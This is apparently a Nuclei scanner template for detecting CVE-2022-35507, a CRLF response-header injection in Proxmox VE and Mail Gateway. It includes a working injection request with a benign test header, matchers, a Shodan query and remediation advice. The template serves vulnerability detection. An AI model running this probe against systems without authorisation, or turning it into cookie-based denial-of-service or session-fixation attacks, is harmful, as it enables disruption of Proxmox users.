id: CVE-2022-35507

info:
  name: Proxmox - CRLF Injection
  author: DhiyaneshDk
  severity: high
  description: |
    A response-header CRLF injection vulnerability in the Proxmox Virtual Environment (PVE) and Proxmox Mail Gateway (PMG) web interface allows a remote attacker to set cookies for a victim's browser that are longer than the server expects, causing a client-side DoS. This affects Chromium-based browsers because they allow injection of response headers with %0d. This is fixed in pve-http-server 4.1-3.
  impact: |
    Attackers can inject response headers with CRLF characters to set malicious cookies in victims' Chromium-based browsers, causing client-side denial of service and potentially facilitating session fixation attacks on Proxmox users.
  remediation: |
    Update pve-http-server to version 4.1-3 or later that properly validates and strips CRLF characters from response headers.
  reference:
    - https://git.proxmox.com/?p=pve-http-server.git%3Ba=commitdiff%3Bh=936007ae0241811093155000486da171379c23c2
    - https://github.com/advisories/GHSA-xfgp-gpjw-wmqr
    - https://starlabs.sg/blog/2022/12-multiple-vulnerabilites-in-proxmox-ve--proxmox-mail-gateway/#bug-0x02-crlf-injection-in-response-headers
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:H
    cvss-score: 7.1
    cve-id: CVE-2022-35507
    cwe-id: CWE-74
    epss-score: 0.35702
    epss-percentile: 0.97161
    cpe: cpe:2.3:a:proxmox:proxmox_mail_gateway:-:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: proxmox
    product: proxmox_mail_gateway
    shodan-query: html:"Proxmox = {"
  tags: cve,cve2022,proxmox,crlf,vuln

http:
  - raw:
      - |
        GET /404%0dnew-header:value%0da: HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - "contains(all_headers, 'new-header:value')"
          - "status_code == 501"
        condition: and
# digest: 4a0a00473045022100aa3f79fd46c4342f1d43605c04f45b1ccbd9bad4022fddc28f5a11fc14c5cca60220249e72187997bfa45aeca7a39d4da81f7a16a3177dcc21e0d28fa648be3c2024:922c64590222798bb761d5b6d8e72950